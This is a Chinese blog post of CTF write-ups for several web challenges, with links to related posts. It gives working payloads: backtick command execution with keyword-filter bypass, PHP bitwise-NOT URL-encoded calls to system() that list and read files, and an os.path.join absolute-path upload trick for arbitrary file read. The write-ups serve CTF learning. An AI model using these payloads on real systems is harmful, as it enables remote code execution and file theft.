[GDOUCTF 2023]EZ WEB、[SWPUCTF 2021 新生赛]hardrce、[NISACTF 2022]babyupload

已于 2024-06-11 20:29:40 修改
阅读量875 收藏 29
点赞数 15
文章标签: 绝对路径拼接漏洞 uuid URL编码取反绕过正则
于 2024-06-11 20:29:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82985722/article/details/139581046
版权

目录

[GDOUCTF 2023]EZ WEB

[UUCTF 2022 新生赛]ez_rce

[SWPUCTF 2021 新生赛]hardrce

URL编码取反绕过正则实现RCE

[NISACTF 2022]babyupload

1.uuid

2.绝对路径拼接漏洞

[GDOUCTF 2023]EZ WEB

打开环境发现路径/src

访问/src,得到app.py文件。发现/super-secret-route-nobody-will-guess使用了PUT方法。

访问/super-secret-route-nobody-will-guess,使用bp抓包改请求头为PUT

发包得到flag

[UUCTF 2022 新生赛]ez_rce

GET传参code。使用ls /查看根目录,正则过滤了/sys、ls,可使用print()、l\s绕过

?code=print(`l\s /`);
//在linux系统中,反引号``作为内联执行,输出查询结果的内容。

发现fffffffffflagafag目录,ca''t查看得到flag

[SWPUCTF 2021 新生赛]hardrce

正则过滤blacklist中的各种符号、大小写。

于是使用:

URL编码取反绕过正则实现RCE

取反绕过正则实现        “~”代表取反运算符

使用原因:取反操作后基本上用的都是不可见字符,所以不会触发正则匹配。取反后需进行URL 编码。

e.g 使用~对phpinfo进行取反操作,再使用urlencode函数对其进行编码

构造payload:        传入后成功回显

?wllm=(~%8F%97%8F%96%91%99%90)();
//~%8F%97%8F%96%91%99%90:对phpinfo函数再取反-->执行phpinfo函数;

故 使用~对system、ls 、cat、flag等进行取反操作,再使用urlencode函数对其进行编码

<?php
echo urlencode(~'system');
echo '\n';
echo urlencode(~'ls /');
echo '\n';
echo urlencode(~'cat /flllllaaaaaaggggggg');
?>

//输出:%8C%86%8C%8B%9A%92
        %93%8C%DF%D0
        %9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98

ls /查看根目录

?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

//~%8C%86%8C%8B%9A%92:对system函数再取反-->恢复并执行system函数;后面同理

cat读取flllllaaaaaaggggggg

?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

[NISACTF 2022]babyupload

[NISACTF 2022]babyupload-CSDN博客

查看源代码发现/source路径

访问得到app.py文件,代码审计

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid   //通用唯一识别码(Universally Unique Identifier),标准格式为xxxxxxxx-xxxx-xxxx-xxxxxxxxxxxx


app = Flask(__name__)

SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""


def db():
    g_db = getattr(g, '_database', None)
    if g_db is None:
        g_db = g._database = sqlite3.connect("database.db")
    return g_db


@app.before_first_request
def setup(): //建立数据库连接
    os.remove("database.db")
    cur = db().cursor()
    cur.executescript(SCHEMA)


@app.route('/')
def hello_world():
    return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file">
    <input type="submit" value="Upload File" name="submit">
</form>
<!-- /source -->
</body>
</html>"""


@app.route('/source')
def source():
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)


@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']

    if "." in file.filename:           //阻止文件名中包含.的文件上传
        return "Bad filename!", 403    //即过滤了后缀名

    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex   //生成文件的uuid
    try:   //检查文件是否重复
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)   //保存文件在uploads/路径下
    return redirect('/file/' + uid)         //返回文件的uuid



@app.route('/file/<id>')
def file(id):             //访问文件
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))    //根据文件uuid,在数据库中查询文件名
    res = cur.fetchone()   //将数据库查询结果返回
    if res is None:
        return "File not found", 404

    # print(res[0])

    with open(os.path.join("uploads/", res[0]), "r") as f:     //将查询到的文件名与uploads/拼接
        return f.read()                                        //os.path.join()函数存在绝对路径拼接漏洞


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

题意:

上传的文件不能有.后缀名,上传后生成一个uuid,并将uuid和文件名存入数据库中,并返回文件的uuid。

再通过/file/uuid访问文件,通过查询数据库得到对应文件名,在文件名前拼接后读取uploads/路径下上传的文件。

1.uuid

uuid/guid简介-CSDN博客 

通用唯一识别码(Universally Unique Identifier),也称为 GUID (Globally Unique IDentifier) 全球唯一标识符。 能基本保证全球唯一性

UUID的标准型式包含32个16进制数字,以连字号分为五段,形式为 8-4-4-4-12 的32个字符。标准格式为xxxxxxxx-xxxx-xxxx-xxxxxxxxxxxx

2.绝对路径拼接漏洞

os.path.join()函数存在绝对路径拼接漏洞

os.path.join()函数用法详解-CSDN博客

os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后。

import os
print(os.path.join('path','line','666'))

#在以/开始的参数,从最后一个以/开头的参数开始拼接,之前的参数全部丢弃。该路径将视为绝对路径。
print(os.path.join('path','/line','666'))
print(os.path.join('path','/line','/666'))

#存在以./开始的参数正常拼接
print(os.path.join('path','line','./666'))

#时存在以./与/开始的参数,以/为主
print(os.path.join('path','/line','./666'))


//输出: path/line/666
        /line/666
        /666
        path/line/./666
        /line/./666

故当上传的文件名为 /flag 时,上传后通过uuid访问文件后,查询到文件名 /flag ,那么进行路径拼接时,uploads/ 将被删除,读取到的就是根目录下的 flag 文件。

上传一句话木马文件,使用bp抓包 修改文件名为 /flag 后发包,利用访问返回的文件路径 file/uuid即可读取 flag。

LLINELL
关注
[UUCTF 2022 新生]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 919
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1091
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
[UUCTF 2022 新生]ez_rce
m0_73612768的博客
01-03 1178
反引号命令执行;shell 绕过关键字过滤;
WebUUCTF 2022 新生 个人复现
uuzeray的博客
12-01 955
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。因此md5[0]应该传入%0a0e215962017,但是我们又多了一个%0a 换行符,通过上面这行代码 $md5[0]=substr($md5[0],$sub);$md5[1]===$guessmd5,后者是1秒一变的,得写脚本了。
2022UUCTF-web
bossDDYY的博客
11-03 2064
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
刷题日记 date 6.6
m0_64348326的博客
06-06 340
刚开始以为是我的exp有问题,然后又找了网上几个wp的反弹shell也是失效,那么很可能的原因就是靶机没出网,直接将payload替换为命令执行,将读取的flag写入。F12查看源码发现了这段功能代码,也是将上传文件解压到hash生成的目录中,其中的/getflag路由则是记载了flag的存放位置是。2.需要让查询到的密码和输入的密码相等,waf过滤了很多字符,这段代码很明显就是和之前几道题相似,直接一眼quine注入。1.进入后是个登陆框,随便输入即可登陆,但是upload功能被拒绝了,说是权限不足。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2685
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2976
此处主要在NSSCTF平台()上开展刷题。
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
西柚SWPU新生(场外同步)miscAK 别的在混(
weixin_47234647的博客
10-18 2172
WEB:gift_F12 没啥好说的 直接F12得了 NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} RE 简简单单的解密 import base64, urllib.parse def e(): key = "HereIsFlagggg" flag = "xxxxxxxxxxxxxxxxxxx" s_box = list(range(256)) j = 0 # 打乱s_box 和flag无关 for i in
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 4103
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
2022 UUCTF Web
weixin_63231007的博客
12-19 2640
2022UUCTF web部分题分析
[UUCTF 2022 新生]ez_rce,零基础学习网络安全
最新发布
m0_61549953的博客
04-06 663
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
UUCTF2022-Writeup
Ivyyyyyy1的博客
10-31 1499
UUCTF2022 Writeup
(CTF学习)CTFHUB-WEB-RCE
weixin_43486981的博客
08-14 5594
CTFHUB-WEB-RCERCEeval执行文件包含strpos()的漏洞php://input知识点 php://input远程包含读取源代码php://filter命令注入linux中命令的链接符号过滤catlinux查看文本的命令过滤空格过滤目录分隔符过滤运算符综合过滤练习 RCE RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵
ez_rce
qq_43774856的博客
12-30 456
ez_rce 打开链接,得到源码 <?php error_reporting(0); if (!isset($_POST['code'])) { highlight_file(__FILE__); } else { if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") { $str = $_POST['code']; $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '
RCE(命令执行)总结
qq_44657899的博客
07-29 7129
命令执行 简单过滤 过滤cat,flag等关键词 1,代替 tac,more,head,nl ,sort 2,使用转义符 ca\t /fl\ag cat fl''ag 3,内联执行绕过 拼接flag 1;a=fl;b=ag.php;cat$IFS$a$b cat$IFS$1`ls`=cat falg.php;cat index.php 过滤空格 %20、%09、$IFS$1、${IFS}、<>、<,{cat,flag} 例; 过滤目录分隔符 例: <?php $res =
中学生CTF平台 Easy RCE write up
Ju0se
04-05 2965
题目地址:http://ctf.klmyssn.com/challenges#Easy RCE http://198.13.45.199:5006/ 查看一下源代码 果断向name传值。 报错,发现eval函数。 然后来看一下题目的hint。哦~果然如我所想的。后面被拼接了三个!,就是为了阻止你正常的执行。 破解方法很简单。加入//进行注释。 成功执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值